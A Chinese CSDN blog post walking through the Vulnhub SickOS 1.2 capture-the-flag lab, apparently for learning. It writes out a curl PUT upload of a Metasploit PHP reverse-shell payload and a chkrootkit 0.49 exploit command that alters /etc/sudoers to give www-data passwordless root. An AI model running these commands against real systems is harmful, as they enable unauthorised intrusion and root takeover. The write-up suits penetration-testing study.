2021年1月19日-NO14-Vulnhub-SickOS1.2渗透学习

最新推荐文章于 2024-11-08 14:34:47 发布
最新推荐文章于 2024-11-08 14:34:47 发布
阅读量208 收藏
点赞数
分类专栏: Vulnhub 文章标签: linux php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AnonyMousIT/article/details/112855324
版权

2021年1月19日-NO:14-Vulnhub-SickOS:1.2渗透学习

一、简介

靶机地址:https://www.vulnhub.com/entry/sickos-12,144/

kali地址:192.168.56.105

靶机IP地址:192.168.56.107

主要工具:curl,Metasploit

二、信息收集

image-20210119223336375

image-20210119223550266

靶机开放着,22和80端口

访问 web页面

image-20210119223701467

只有一张图片,有点像何润东呢

进行目录爆破

image-20210119223933417

发现test目录,访问试试

image-20210119224009170

然而啥也没有

继续使用nikto扫描

image-20210119224406874

再使用curl检查目录test上能用的HTTP方法

curl -v -X OPTIONS http://192.168.56.107/test/

image-20210119224701552

可以上传文件

三、提权

使用msf制作biu.php ,作用你懂的

image-20210119232152794

利用curl上传

curl --upload-file biu.php -v --url http://192.168.56.107/test/biu.php -0 --http1.0

image-20210119225435722

image-20210119225501609

上传成功

使用Metasploit连接

image-20210119234921339

在web页面点击biu.php, msf将获得shell

image-20210119231046689

image-20210119231401969

找到了chkrootkit 0.49 ,向量提权

查看版本,注意 -V是大写

image-20210119231513320

使用谷歌大法 搜索

image-20210119231757798

image-20210119231814460

可以用33899.c进行提权
需文件需要位于/ tmp / update

image-20210119231847305

原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。可以利用这一点,在/tmp目录下新建update文件,让root帮我们做事情。

image-20210119234603465

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

使用 sudo su - 提权

image-20210119234627553

成功获得root权限

image-20210119234717170

获得 flag

之前设置了其他端口怎样都获取不到shell,原来防火墙设置了规则,只允许80,8080,22,443进出

image-20210119234823251

四、总结

只能使用443端口 是没有想到的

root权限运行

 chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL

可以通过 sudo su - 不用输入密码获得root

在下菜鸟
关注
专栏目录
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 458
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3965
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 929
一、实验环境 靶机SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
Linux下的systemd/service
zxz_Fine的博客
11-05 550
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 503
rocky 部署Harbor私有镜像仓库
linux长时间运行任务中断报警trap
最新发布
djl的专栏,blog.djl.cx好记
11-08 79
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
linux-find和zgrep
luxideyao的专栏
11-07 272
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux:网络协议socket
Au_ust的博客
11-05 1132
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Linux——Linux基础指令
辰多代码的博客
11-05 813
比 more 更强大的分页器,支持前后翻页和搜索。1:移动文件或目录(前提是目标文件或目录不存在)。:重命名文件或目录(前提是目标文件或目录存在)。::显示系统上当前登录的用户及其相关信息。:显示网络连接、路由表和网络接口统计信息。:统计文件的行数、字数和字节数。:显示当前工作目录的完整路径。:列出目录中的文件和子目录。:显示或设置系统期和时间。:在目录层次结构中搜索文件。:显示系统中正在运行的进程。:配置或显示网络接口信息。:显示当前用户的用户名。:更新现有文件的时间戳。:查找可执行文件的位置。
Linux kernel 源码下载与源码在线阅读地址及其相关资源网站
代码背包客的博客
11-06 382
Linux内核源码的下载地址和在线阅读方式有多种,下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站,供大家参考学习
[linux 驱动]PWM子系统详解
weixin_49406449的博客
11-04 873
搜索“rockchip,rk3328-pwm”,发现在./drivers/pwm/pwm-rockchip.c 出现,所以 pwm6 的驱动是pwm-rockchip。任何 PWM 设备实例都可以被注册到 pwm_class 下,用户空间应用可以通过 /sys/class/pwm 访问这些设备,实现对 PWM 功能的控制。struct pwm_device *pwm: 这是指向 PWM 设备结构体的指针,该结构体是在调用 pwm_request 函数时获取的。这是指向该控制器的 PWM 通道的数组或链表。
LInux基础 (一):Linux 系统重要命令拾遗
vortex5的博客
11-06 1073
SUID(Set User ID)是文件权限中的一种特殊标志,表示该文件在执行时将使用文件所有者的权限,而不是执行者的权限。Sticky 位是另一种特殊权限,主要用于目录,表示只有文件的所有者才能删除该目录中的文件,而其他用户只能修改自己的文件。硬链接是指向文件的多个入口,所有硬链接指向相同的数据块,不会占用额外的磁盘空间,除非删除所有硬链接。软链接类似于Windows的快捷方式,它是一个独立的文件,包含了指向目标文件的路径。笔记内容参考了B站UP主 泷羽sec 的学习视频,如有侵权,将立即删除。
Linux磁盘存储
眷怀的博客
11-06 1129
设备文件是类Unix操作系统(包括Linux)中一种特殊的文件类型,它代表了设备接口,使得用户空间的程序可以通过标准的文件操作来访问和控制硬件设备。设备文件为周边设备提供了简单的接口,如打印机、硬盘等,也可以访问没有连接到任何真实设备的系统资源,如随机数生成器等。
嵌入式Linux入门具备:C语言基础与基本驱动学习(2):Linux GIibc IO基础
charlie114514191的博客
11-05 696
对于标准 I/O 库函数来说,它们的操作是围绕 FILE 指针进行的,当使用标准 I/O 库函数打开或创建一个文件时,会返回一个指向 FILE 类型对象的指针(FILE *) ,使用该 FILE 指针与被打开或创建的文件相关联,然后该 FILE 指针就用于后续的标准 I/O 操作(使用标准 I/O 库函数进行 I/O 操作),所以由此可知,FILE 指针的作用相当于文件描述符,只不过 FILE 指针用于标准 I/O 库函数中、而文件描述符则用于文件I/O 系统调用中。函数调用成功返回写入到文件中的字符数;
Linux
林宇恒的博客
11-06 371
yum类似应用商店客户端,有人已经把软件写好放在服务器上了,通过yum找到服务器上的软件下载。
Linux】拆分详解 - vim / gcc / makefile
bubble_shadow的博客
11-08 715
本文介绍了 Linux 中与编程强相关的三个工具:文本编辑器,代码编译器,自动化编译器。旨在帮助初学者快速入手使用 Linux 进行代码编写与编译。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值